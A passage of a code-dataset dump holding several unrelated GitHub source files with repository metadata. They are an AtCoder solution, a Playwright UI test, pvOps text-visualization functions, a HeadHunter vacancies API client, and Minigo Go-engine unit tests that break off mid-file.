break\n\n\ncajero()\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej10/hito1_ej10_8b00fea1fb067fb1f1ea7b14f2c2e567.py","file_name":"hito1_ej10_8b00fea1fb067fb1f1ea7b14f2c2e567.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30338066826","text":"# -*- coding: utf-8 -*-\n# B - Making Triangle\n# https://atcoder.jp/contests/abc175/tasks/abc175_b\n\nN = int(input())\nL = sorted(list(map(int, input().split())))\n\nans = 0\n\nfor i in range(N):\n for j in range(i):\n for k in range(j):\n if L[i] != L[j] and L[j] != L[k]:\n if L[j] + L[k] > L[i]:\n ans += 1\n\nprint(ans)\n\n# 15:29 - 16:03(解説を閲覧)- 16:23(C++を翻訳写経)\n# 17:02 - 17:10(AC)\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_B/ABC175B.py","file_name":"ABC175B.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"378380132","text":"from playwright.sync_api import Playwright, sync_playwright\n\n\ndef run(playwright: Playwright) -> None:\n browser = playwright.chromium.launch(headless=False)\n context = browser.new_context()\n\n # Open new page\n page = context.new_page()\n\n # Go to https://momodel.cn/\n page.goto(\"https://momodel.cn/\")\n\n # Click text=数据集\n # with page.expect_navigation(url=\"https://momodel.cn/dataset?&p=1\"):\n with page.expect_navigation():\n page.click(\"text=数据集\")\n # assert page.url == \"https://momodel.cn/dataset\"\n\n # Close page\n page.close()\n\n # ---------------------\n context.close()\n browser.close()\n\n\nwith sync_playwright() as playwright:\n run(playwright)\n","repo_name":"WangYuJiee/Motest","sub_path":"ui_test/other/ MoSearch3.py","file_name":" MoSearch3.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"17232308869","text":"# visualizations\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport networkx as nx\nfrom sklearn.metrics import ConfusionMatrixDisplay\n\n# data structures\nimport numpy as np\nimport pandas as pd\n\n# utils\nimport copy\nimport datetime\nfrom collections import Counter\n\n# Embedding\nimport nltk\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom gensim.models.doc2vec import TaggedDocument\nfrom nltk.tokenize import word_tokenize\n\n\ndef visualize_attribute_connectivity(\n om_df,\n om_col_dict,\n figsize=(40, 20),\n attribute_colors=[\"lightgreen\", \"cornflowerblue\"],\n edge_width_scalar=10,\n graph_aargs={},\n):\n \"\"\"Visualize a knowledge graph which shows the frequency of combinations between attributes\n ``ATTRIBUTE1_COL`` and ``ATTRIBUTE2_COL``\n\n Parameters\n ----------\n om_df : DataFrame\n A pandas dataframe containing O&M data, which contains columns specified in om_col_dict\n om_col_dict : dict of {str : str}\n A dictionary that contains the column names to be used in\n visualization::\n\n {\n 'attribute1_col' : string,\n 'attribute2_col' : string\n }\n\n figsize : tuple\n Figure size\n attribute_colors : list\n List of two strings which designate the colors for Attribute1 and Attribute 2, respectively.\n edge_width_scalar : numeric\n Weight utilized to cause dynamic widths based on number of connections between Attribute 1\n and Attribute 2.\n graph_aargs : dict\n Optional, arguments passed to networkx graph drawer.\n Suggested attributes to pass:\n\n - with_labels=True\n - font_weight='bold'\n - node_size=19000\n - font_size=35\n - node_color='darkred'\n - font_color='red'\n\n Returns\n -------\n Matplotlib figure instance,\n networkx EdgeView object\n i.e. [('A', 'X'), ('X', 'B'), ('C', 'Y'), ('C', 'Z')]\n \"\"\"\n df = om_df.copy()\n ATTRIBUTE1_COL = om_col_dict[\"attribute1_col\"]\n ATTRIBUTE2_COL = om_col_dict[\"attribute2_col\"]\n\n nx_data = []\n for a in np.unique(df[ATTRIBUTE1_COL].tolist()):\n df_iter = df[df[ATTRIBUTE1_COL] == a]\n for i in np.unique(df_iter[ATTRIBUTE2_COL].tolist()):\n w = len(df_iter[df_iter[ATTRIBUTE2_COL] == i])\n nx_data.append([a, i, w])\n\n unique_df = pd.DataFrame(\n nx_data, columns=[ATTRIBUTE1_COL, ATTRIBUTE2_COL, \"w\"])\n\n G = nx.from_pandas_edgelist(unique_df, ATTRIBUTE1_COL, ATTRIBUTE2_COL, \"w\")\n fig = plt.figure(figsize=figsize)\n fig.suptitle(\n f\"Connectivity between {ATTRIBUTE1_COL} and {ATTRIBUTE2_COL}\",\n fontsize=50,\n y=1.08,\n fontweight=\"bold\",\n )\n\n color_map = []\n for node in G:\n if node in np.unique(df[ATTRIBUTE2_COL].tolist()):\n color_map.append(attribute_colors[1])\n else:\n color_map.append(attribute_colors[0])\n\n edges = G.edges()\n weights = [G[u][v][\"w\"] for u, v in edges]\n weights = np.array(weights)\n weights = list(1 + (edge_width_scalar * weights /\n weights.max())) # scale 1-11\n nx.draw_shell(G, width=weights, node_color=color_map, **graph_aargs)\n\n return fig, edges\n\n\ndef visualize_attribute_timeseries(\n om_df, om_col_dict, date_structure=\"%Y-%m\", figsize=(12, 6), cmap_name=\"brg\"\n):\n \"\"\"Visualize stacked bar chart of attribute frequency over time, where x-axis is time and y-axis is count, displaying separate bars\n for each label within the label column\n\n Parameters\n ----------\n om_df : DataFrame\n A pandas dataframe of O&M data, which contains columns in om_col_dict\n om_col_dict : dict of {str : str}\n A dictionary that contains the column names relevant for the get_dates fn\n\n - **label** (*string*), should be assigned to associated column name for the label/attribute of interest in om_df\n - **date** (*string*), should be assigned to associated column name for the dates relating to the documents in om_df\n\n date_structure : str\n Controls the resolution of the bar chart's timeseries\n Default : \"%Y-%m\". Can change to include finer resolutions (e.g., by including day, \"%Y-%m-%d\")\n or coarser resolutions (e.g., by year, \"%Y\")\n figsize : tuple\n Optional, figure size\n cmap_name : str\n Optional, color map name in matplotlib\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n df = om_df.copy()\n LABEL_COLUMN = om_col_dict[\"label\"]\n DATE_COLUMN = om_col_dict[\"date\"]\n\n def restructure(vals, inds, ind_set):\n out = np.zeros(len(ind_set))\n for ind, val in zip(inds, vals):\n loc = ind_set.index(ind)\n out[loc] = val\n return out\n\n fig = plt.figure(figsize=figsize)\n asset_set = list(set(df[LABEL_COLUMN].tolist()))\n\n dates = df[DATE_COLUMN].tolist()\n assets_list = df[LABEL_COLUMN].tolist()\n\n full_date_list = [i.strftime(date_structure) for i in dates]\n datetime_list = [\n datetime.datetime.strptime(i, date_structure) for i in full_date_list\n ]\n date_set = list(set(datetime_list))\n date_set = sorted(date_set)\n date_set = [i.strftime(date_structure) for i in date_set]\n assets_list = np.array(assets_list)\n\n asset_sums = []\n index_sums = []\n for dt in date_set:\n inds = [i for i, x in enumerate(full_date_list) if x == dt]\n alist = assets_list[inds]\n\n index_sums += [dt] * len(alist)\n asset_sums += list(alist)\n\n asset_set = list(set(asset_sums))\n\n newdf = pd.DataFrame()\n newdf[LABEL_COLUMN] = asset_sums\n newdf[DATE_COLUMN] = index_sums\n\n cmap = matplotlib.colormaps.get_cmap(cmap_name).resampled(len(asset_set))\n\n graphs = []\n for i, a in enumerate(asset_set):\n iter_ = newdf[newdf[LABEL_COLUMN] == a]\n valcounts = iter_[DATE_COLUMN].value_counts()\n valcounts.sort_index(inplace=True)\n vals = restructure(valcounts.values, valcounts.index, date_set)\n p = plt.bar(date_set, vals, color=cmap(i))\n graphs.append(p[0])\n\n plt.legend(graphs, list(asset_set))\n plt.xlabel(\"Month\")\n plt.ylabel(f\"Affected {LABEL_COLUMN} counts\")\n plt.xticks(rotation=45)\n return fig\n\n\ndef visualize_cluster_entropy(\n doc2vec, eval_kmeans, om_df, data_cols, ks, cmap_name=\"brg\"\n):\n \"\"\"Visualize entropy of embedding space parition. Currently only supports doc2vec embedding.\n\n Parameters\n ----------\n doc2vec : Doc2Vec model instance\n Instance of gensim.models.doc2vec.Doc2Vec\n eval_kmeans : callable\n Callable cluster fit function\n For instance,\n\n .. code-block:: python\n\n def eval_kmeans(X,k):\n km = KMeans(n_clusters=k)\n km.fit(X)\n return km\n\n om_df : DataFrame\n A pandas dataframe containing O&M data, which contains columns specified in om_col_dict\n data_cols : list\n List of column names (str) which have text data.\n ks : list\n List of k parameters required for the clustering mechanic `eval_kmeans`\n cmap_name :\n Optional, color map\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n df = om_df.copy()\n cols = data_cols\n\n fig = plt.figure(figsize=(6, 6))\n cmap = plt.cm.get_cmap(cmap_name, len(cols) * 2)\n\n for i, col in enumerate(cols):\n X = df[col].tolist()\n X = [x.lower() for x in X]\n\n tokenized_data = [word_tokenize(x) for x in X]\n\n doc2vec_data = [\n TaggedDocument(words=x, tags=[str(i)]) for i, x in enumerate(tokenized_data)\n ]\n model = copy.deepcopy(doc2vec)\n model.build_vocab(doc2vec_data)\n model.train(\n doc2vec_data, total_examples=model.corpus_count, epochs=model.epochs\n )\n X_doc2vec = [model.infer_vector(tok_doc) for tok_doc in tokenized_data]\n\n sse = []\n clusters = []\n for true_k in ks:\n km = eval_kmeans(X_doc2vec, true_k)\n sse.append(km.inertia_)\n clusters.append(km.labels_)\n plt.plot(\n ks, sse, color=cmap(2 * i), marker=\"o\", label=f\"Doc2Vec + {col} entropy\"\n )\n\n vectorizer = TfidfVectorizer()\n X_tfidf = vectorizer.fit_transform(X)\n\n sse = []\n clusters = []\n for true_k in ks:\n km = eval_kmeans(X_tfidf, true_k)\n sse.append(km.inertia_)\n clusters.append(km.labels_)\n plt.plot(\n ks, sse, color=cmap(2 * i + 1), marker=\"o\", label=f\"TF-IDF + {col} entropy\"\n )\n\n plt.xlabel(r\"Number of clusters *k*\")\n plt.ylabel(\"Sum of squared distance\")\n plt.legend()\n\n return fig\n\n\ndef visualize_document_clusters(cluster_tokens, min_frequency=20):\n \"\"\"Visualize words most frequently occurring in a cluster. Especially useful when visualizing\n the results of an unsupervised partitioning of documents.\n\n Parameters\n ----------\n cluster_tokens : list\n List of tokenized documents\n min_frequency : int\n Minimum number of occurrences that a word must have in a cluster for it to be visualized\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n # IDEA: instead of using frequency, use importance with other embeddings too\n all_tokens = [item for sublist in cluster_tokens for item in sublist]\n # important_words_freq is [[word1,freq1],[word2,freq2],...]\n total_important_words_freq = Counter(all_tokens).most_common()\n word_freq_df = pd.DataFrame(\n total_important_words_freq, columns=[\"word\", \"freq\"])\n\n all_words_of_interest = []\n for tokens in cluster_tokens:\n # important_words_freq is [[word1,freq1],[word2,freq2],...]\n important_words_freq = Counter(tokens).most_common()\n for word, freq in important_words_freq:\n if freq >= min_frequency:\n all_words_of_interest.append(word)\n\n unique_words = np.unique(all_words_of_interest)\n\n cluster_list = []\n freq_list = []\n word_list = []\n for wd in unique_words:\n freq = word_freq_df[word_freq_df[\"word\"] == wd][\"freq\"].tolist()[0]\n clusters_this_wd = [\n idx\n for idx, words_in_cluster in enumerate(all_words_of_interest)\n if wd in words_in_cluster\n ]\n clusters_this_wd = list(map(str, clusters_this_wd))\n cluster_list.append(\", \".join(clusters_this_wd))\n freq_list.append(freq)\n word_list.append(wd)\n\n # fig = plt.figure(figsize=(10,20))\n\n filter_cluster_list = []\n filter_freq_list = []\n filter_word_list = []\n for fr, cl, wd in sorted(zip(freq_list, cluster_list, word_list)):\n filter_cluster_list.append(cl)\n filter_freq_list.append(fr)\n filter_word_list.append(wd)\n\n df = pd.DataFrame(index=filter_cluster_list)\n df[\"freq\"] = filter_freq_list\n ax = df[\"freq\"].plot(kind=\"barh\", figsize=(\n 20, 14), color=\"coral\", fontsize=13)\n\n xbias = 0.3\n ybias = 0.0\n for idx, i in enumerate(ax.patches):\n ax.text(\n i.get_width() + xbias,\n i.get_y() + ybias,\n filter_word_list[idx],\n fontsize=15,\n color=\"dimgrey\",\n )\n\n return ax\n\n\ndef visualize_word_frequency_plot(\n tokenized_words, title=\"\", font_size=16, graph_aargs={}\n):\n \"\"\"Visualize the frequency distribution of words within a set of documents\n\n Parameters\n ----------\n tokenized_words : list\n List of tokenized words\n title : str\n Optional, title of plot\n font_size : int\n Optional, font size\n aargs :\n Optional, other parameters passed to nltk.FreqDist.plot()\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n matplotlib.rcParams.update({\"font.size\": font_size})\n fd = nltk.FreqDist(tokenized_words)\n fig = plt.figure(figsize=(12, 6))\n fd.plot(30, cumulative=False, title=title, figure=fig, **graph_aargs)\n return fd\n\n\ndef visualize_classification_confusion_matrix(om_df, col_dict, title=''):\n \"\"\"Visualize confusion matrix comparing known categorical values, and predicted categorical values.\n\n Parameters\n ----------\n om_df : DataFrame\n A pandas dataframe containing O&M data, which contains columns specified in om_col_dict\n col_dict : dict of {str : str}\n A dictionary that contains the column names needed:\n\n - data : string, should be assigned to associated column which stores the tokenized text logs\n - attribute_col : string, will be assigned to attribute column and used to create new attribute_col\n - predicted_col : string, will be used to create keyword search label column\n\n title : str\n Optional, title of plot\n\n Returns\n -------\n Matplotlib figure instance\n \"\"\"\n act_col = col_dict['attribute_col']\n pred_col = col_dict['predicted_col']\n\n # drop any predicted labels with no actual labels in the data, for a cleaner visual\n no_real_values = [cat for cat in om_df[pred_col].unique() if cat not in om_df[act_col].unique()]\n no_real_values_mask = om_df[pred_col].isin(no_real_values)\n om_df = om_df[~no_real_values_mask]\n caption_txt = f'NOTE: Predicted values{no_real_values} had no actual values in the dataset.'\n\n plt.rcParams.update({'font.size': 8})\n cm_display = ConfusionMatrixDisplay.from_predictions(y_true=om_df[act_col],\n y_pred=om_df[pred_col],\n normalize='true',\n )\n fig = cm_display.plot()\n plt.xticks(rotation=90)\n plt.tight_layout()\n plt.figtext(0.00, 0.01, caption_txt, wrap=True, fontsize=7)\n plt.title(title)\n return fig\n","repo_name":"sandialabs/pvOps","sub_path":"pvops/text/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":13783,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"877178810","text":"import json\n\nimport requests\n\n\ndef get_all_employers(word: str) -> [dict]:\n \"\"\" Return list of dicts, includes all employers upon word for search\"\"\"\n\n # Defining entering data\n param: dict = {'text': word,\n 'page': 0,\n 'per_page': 100}\n\n # pulling info from Headhunter and transform it in json format\n request = requests.get('https://api.hh.ru/employers', param)\n\n data = request.content.decode()\n json_object: dict = json.loads(data)['items']\n return json_object\n\n\ndef print_message_employers(employers_list) -> None:\n \"\"\" Printing all employers, who do have open vacancies\"\"\"\n\n # If list of dicts is not empty\n if len(employers_list) > 0:\n\n # Setting id for employer, then it will be used by user to choose employer\n employer_id: int = 0\n for employer in employers_list:\n if employer[\"open_vacancies\"] == 0:\n continue\n employer_id += 1\n print(f'{employer_id} Company name: {employer[\"name\"]}\\n '\n f'Amount of open vacancies: {employer[\"open_vacancies\"]}\\n')\n else:\n print('No employers are found')\n\n\ndef get_employer(employer: str, employers_list: [dict]) -> [dict]:\n \"\"\" Return vacancies for chosen Employer. If no such Employer, return message\"\"\"\n\n # Defining entering data\n param = {'page': 0,\n 'per_page': 100}\n\n # Set empty list, where employers with open vacancies will be added\n final_employers_list: list = []\n\n for chosen_employer in employers_list:\n if chosen_employer[\"open_vacancies\"] != 0:\n final_employers_list.append(chosen_employer)\n\n # pulling info from Headhunter and transform it in json format\n # Request is performed by index in final_employers_list, 'employer' is a value, set by user\n request = requests.get(final_employers_list[int(employer) - 1][\"vacancies_url\"], param)\n data = request.content.decode()\n json_object: dict = json.loads(data)\n return json_object['items']\n\n\ndef print_message_vacancies(chosen_employer: [dict]) -> None:\n \"\"\" Printing info about vacancies\"\"\"\n\n try:\n for vacancy in chosen_employer:\n if vacancy['salary'] is None:\n vacancy['salary'] = {'from': None, 'to': None}\n if vacancy['salary'].get('from') is None:\n vacancy[\"salary\"][\"from\"] = \"\"\n if vacancy['salary'].get('to') is None:\n vacancy[\"salary\"][\"to\"] = \"\"\n if vacancy['snippet'].get('responsibility') is None:\n vacancy['snippet'][\"responsibility\"] = \"\"\n\n print(f' Vacancy name: {vacancy[\"name\"]}\\n'\n f' Description: {vacancy[\"snippet\"][\"responsibility\"]}\\n'\n f' City: {vacancy[\"area\"][\"name\"]}\\n'\n f' Salary from: {vacancy[\"salary\"][\"from\"]} to {vacancy[\"salary\"][\"to\"]}\\n')\n except TypeError:\n return None\n","repo_name":"MihailBashkatov/Course_work_5","sub_path":"utils/utils_api.py","file_name":"utils_api.py","file_ext":"py","file_size_in_byte":3011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"35566410013","text":"import numpy as np\n\nimport coords\nfrom go import Position, PlayerMove, LibertyTracker, WHITE, BLACK\nimport go\nimport sgf_wrapper\nfrom tests import test_utils\n\nEMPTY_ROW = '.' * go.N + '\\n'\nTEST_BOARD = test_utils.load_board('''\n.X.....OO\nX........\n''' + EMPTY_ROW * 7)\n\nNO_HANDICAP_SGF = \"(;CA[UTF-8]SZ[9]PB[Murakawa Daisuke]PW[Iyama Yuta]KM[6.5]HA[0]RE[W+1.5]GM[1];B[fd];W[cf];B[eg];W[dd];B[dc];W[cc];B[de];W[cd];B[ed];W[he];B[ce];W[be];B[df];W[bf];B[hd];W[ge];B[gd];W[gg];B[db];W[cb];B[cg];W[bg];B[gh];W[fh];B[hh];W[fg];B[eh];W[ei];B[di];W[fi];B[hg];W[dh];B[ch];W[ci];B[bh];W[ff];B[fe];W[hf];B[id];W[bi];B[ah];W[ef];B[dg];W[ee];B[di];W[ig];B[ai];W[ih];B[fb];W[hi];B[ag];W[ab];B[bd];W[bc];B[ae];W[ad];B[af];W[bd];B[ca];W[ba];B[da];W[ie])\"\n\n\ndef coords_from_gtp_set(string):\n return frozenset(map(coords.from_gtp, string.split()))\n\n\nclass TestBasicFunctions(test_utils.MinigoUnitTest):\n def test_load_board(self):\n self.assertEqualNPArray(go.EMPTY_BOARD, np.zeros([go.N, go.N]))\n self.assertEqualNPArray(\n go.EMPTY_BOARD, test_utils.load_board('. \\n' * go.N ** 2))\n\n def test_neighbors(self):\n corner = coords.from_gtp('A1')\n neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[corner]]\n self.assertEqual(len(neighbors), 2)\n\n side = coords.from_gtp('A2')\n side_neighbors = [go.EMPTY_BOARD[c] for c in go.NEIGHBORS[side]]\n self.assertEqual(len(side_neighbors), 3)\n\n def test_is_koish(self):\n self.assertEqual(go.is_koish(\n TEST_BOARD, coords.from_gtp('A9')), BLACK)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('B8')), None)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('B9')), None)\n self.assertEqual(go.is_koish(TEST_BOARD, coords.from_gtp('E5')), None)\n\n def test_is_eyeish(self):\n board = test_utils.load_board('''\n .XX...XXX\n X.X...X.X\n XX.....X.\n ........X\n XXXX.....\n OOOX....O\n X.OXX.OO.\n .XO.X.O.O\n XXO.X.OO.\n ''')\n B_eyes = coords_from_gtp_set('A2 A9 B8 J7 H8')\n W_eyes = coords_from_gtp_set('H2 J1 J3')\n not_eyes = coords_from_gtp_set('B3 E5')\n for be in B_eyes:\n self.assertEqual(go.is_eyeish(board, be), BLACK, str(be))\n for we in W_eyes:\n self.assertEqual(go.is_eyeish(board, we), WHITE, str(we))\n for ne in not_eyes:\n self.assertEqual(go.is_eyeish(board, ne), None, str(ne))\n\n\nclass TestLibertyTracker(test_utils.MinigoUnitTest):\n def test_lib_tracker_init(self):\n board = test_utils.load_board('X........' + EMPTY_ROW * 8)\n\n lib_tracker = LibertyTracker.from_board(board)\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 2)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(sole_group.stones, coords_from_gtp_set('A9'))\n self.assertEqual(sole_group.liberties, coords_from_gtp_set('B9 A8'))\n self.assertEqual(sole_group.color, BLACK)\n\n def test_place_stone(self):\n board = test_utils.load_board('X........' + EMPTY_ROW * 8)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(BLACK, coords.from_gtp('B9'))\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 3)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('B9')], 3)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(sole_group.stones, coords_from_gtp_set('A9 B9'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('C9 A8 B8'))\n self.assertEqual(sole_group.color, BLACK)\n\n def test_place_stone_opposite_color(self):\n board = test_utils.load_board('X........' + EMPTY_ROW * 8)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(WHITE, coords.from_gtp('B9'))\n self.assertEqual(len(lib_tracker.groups), 2)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('A9')], go.MISSING_GROUP_ID)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('B9')], go.MISSING_GROUP_ID)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('A9')], 1)\n self.assertEqual(lib_tracker.liberty_cache[coords.from_gtp('B9')], 2)\n black_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n white_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B9')]]\n self.assertEqual(black_group.stones, coords_from_gtp_set('A9'))\n self.assertEqual(black_group.liberties, coords_from_gtp_set('A8'))\n self.assertEqual(black_group.color, BLACK)\n self.assertEqual(white_group.stones, coords_from_gtp_set('B9'))\n self.assertEqual(white_group.liberties, coords_from_gtp_set('C9 B8'))\n self.assertEqual(white_group.color, WHITE)\n\n def test_merge_multiple_groups(self):\n board = test_utils.load_board('''\n .X.......\n X.X......\n .X.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n lib_tracker.add_stone(BLACK, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 1)\n self.assertNotEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n sole_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B8')]]\n self.assertEqual(sole_group.stones,\n coords_from_gtp_set('B9 A8 B8 C8 B7'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('A9 C9 D8 A7 C7 B6'))\n self.assertEqual(sole_group.color, BLACK)\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in sole_group.stones:\n self.assertEqual(liberty_cache[stone], 6, str(stone))\n\n def test_capture_stone(self):\n board = test_utils.load_board('''\n .X.......\n XO.......\n .X.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('C8'))\n self.assertEqual(len(lib_tracker.groups), 4)\n self.assertEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n self.assertEqual(captured, coords_from_gtp_set('B8'))\n\n def test_capture_many(self):\n board = test_utils.load_board('''\n .XX......\n XOO......\n .XX......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('D8'))\n self.assertEqual(len(lib_tracker.groups), 4)\n self.assertEqual(\n lib_tracker.group_index[coords.from_gtp('B8')], go.MISSING_GROUP_ID)\n self.assertEqual(captured, coords_from_gtp_set('B8 C8'))\n\n left_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A8')]]\n self.assertEqual(left_group.stones, coords_from_gtp_set('A8'))\n self.assertEqual(left_group.liberties,\n coords_from_gtp_set('A9 B8 A7'))\n\n right_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'D8')]]\n self.assertEqual(right_group.stones, coords_from_gtp_set('D8'))\n self.assertEqual(right_group.liberties,\n coords_from_gtp_set('D9 C8 E8 D7'))\n\n top_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B9')]]\n self.assertEqual(top_group.stones, coords_from_gtp_set('B9 C9'))\n self.assertEqual(top_group.liberties,\n coords_from_gtp_set('A9 D9 B8 C8'))\n\n bottom_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B7')]]\n self.assertEqual(bottom_group.stones, coords_from_gtp_set('B7 C7'))\n self.assertEqual(bottom_group.liberties,\n coords_from_gtp_set('B8 C8 A7 D7 B6 C6'))\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in top_group.stones:\n self.assertEqual(liberty_cache[stone], 4, str(stone))\n for stone in left_group.stones:\n self.assertEqual(liberty_cache[stone], 3, str(stone))\n for stone in right_group.stones:\n self.assertEqual(liberty_cache[stone], 4, str(stone))\n for stone in bottom_group.stones:\n self.assertEqual(liberty_cache[stone], 6, str(stone))\n for stone in captured:\n self.assertEqual(liberty_cache[stone], 0, str(stone))\n\n def test_capture_multiple_groups(self):\n board = test_utils.load_board('''\n .OX......\n OXX......\n XX.......\n ''' + EMPTY_ROW * 6)\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('A9'))\n self.assertEqual(len(lib_tracker.groups), 2)\n self.assertEqual(captured, coords_from_gtp_set('B9 A8'))\n\n corner_stone = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(corner_stone.stones, coords_from_gtp_set('A9'))\n self.assertEqual(corner_stone.liberties, coords_from_gtp_set('B9 A8'))\n\n surrounding_stones = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'C9')]]\n self.assertEqual(surrounding_stones.stones,\n coords_from_gtp_set('C9 B8 C8 A7 B7'))\n self.assertEqual(surrounding_stones.liberties,\n coords_from_gtp_set('B9 D9 A8 D8 C7 A6 B6'))\n\n liberty_cache = lib_tracker.liberty_cache\n for stone in corner_stone.stones:\n self.assertEqual(liberty_cache[stone], 2, str(stone))\n for stone in surrounding_stones.stones:\n self.assertEqual(liberty_cache[stone], 7, str(stone))\n\n def test_same_friendly_group_neighboring_twice(self):\n board = test_utils.load_board('''\n XX.......\n X........\n ''' + EMPTY_ROW * 7)\n\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(BLACK, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 1)\n sole_group_id = lib_tracker.group_index[coords.from_gtp('A9')]\n sole_group = lib_tracker.groups[sole_group_id]\n self.assertEqual(sole_group.stones,\n coords_from_gtp_set('A9 B9 A8 B8'))\n self.assertEqual(sole_group.liberties,\n coords_from_gtp_set('C9 C8 A7 B7'))\n self.assertEqual(captured, set())\n\n def test_same_opponent_group_neighboring_twice(self):\n board = test_utils.load_board('''\n XX.......\n X........\n ''' + EMPTY_ROW * 7)\n\n lib_tracker = LibertyTracker.from_board(board)\n captured = lib_tracker.add_stone(WHITE, coords.from_gtp('B8'))\n self.assertEqual(len(lib_tracker.groups), 2)\n black_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'A9')]]\n self.assertEqual(black_group.stones, coords_from_gtp_set('A9 B9 A8'))\n self.assertEqual(black_group.liberties, coords_from_gtp_set('C9 A7'))\n\n white_group = lib_tracker.groups[lib_tracker.group_index[coords.from_gtp(\n 'B8')]]\n self.assertEqual(white_group.stones, coords_from_gtp_set('B8'))\n self.assertEqual(white_group.liberties, coords_from_gtp_set('C8 B7'))\n\n self.assertEqual(captured, set())\n\n\nclass TestPosition(test_utils.MinigoUnitTest):\n def test_passing(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=coords.from_gtp('A1'),\n recent=tuple(),\n to_play=BLACK,\n )\n expected_position = Position(\n board=TEST_BOARD,\n n=1,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=(PlayerMove(BLACK, None),),\n to_play=WHITE,\n )\n pass_position = start_position.pass_move()\n self.assertEqualPositions(pass_position, expected_position)\n\n def test_flipturn(self):\n start_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=coords.from_gtp('A1'),\n recent=tuple(),\n to_play=BLACK,\n )\n expected_position = Position(\n board=TEST_BOARD,\n n=0,\n komi=6.5,\n caps=(1, 2),\n ko=None,\n recent=tuple(),\n to_play=WHITE,\n )\n flip_position = start_position.flip_playerturn()\n self.assertEqualPositions(flip_position, expected_position)\n\n def test_is_move_suicidal(self):\n board = test_utils.load_board('''\n ...O.O...\n ....O....\n XO.....O.\n OXO...OXO\n O.XO.OX.O\n OXO...OOX\n XO.......\n ......XXO\n .....XOO.\n ''')\n position = Position(\n board=board,\n to_play=BLACK,\n )\n suicidal_moves = coords_from_gtp_set('E9 H5')\n nonsuicidal_moves = coords_from_gtp_set('B5 J1 A9')\n for move in suicidal_moves:\n # sanity check my coordinate input\n self.assertEqual(position.board[move], go.EMPTY)\n self.assertTrue(position.is_move_suicidal(move), str(move))\n for move in nonsuicidal_moves:\n # sanity check my coordinate input\n self.assertEqual(position.board[move], go.EMPTY)\n self.assertFalse(position.is_move_suicidal(move), str(move))\n\n def test_legal_moves(self):\n board = test_utils.load_board('''\n .O.O.XOX.\n O..OOOOOX\n ......O.O\n 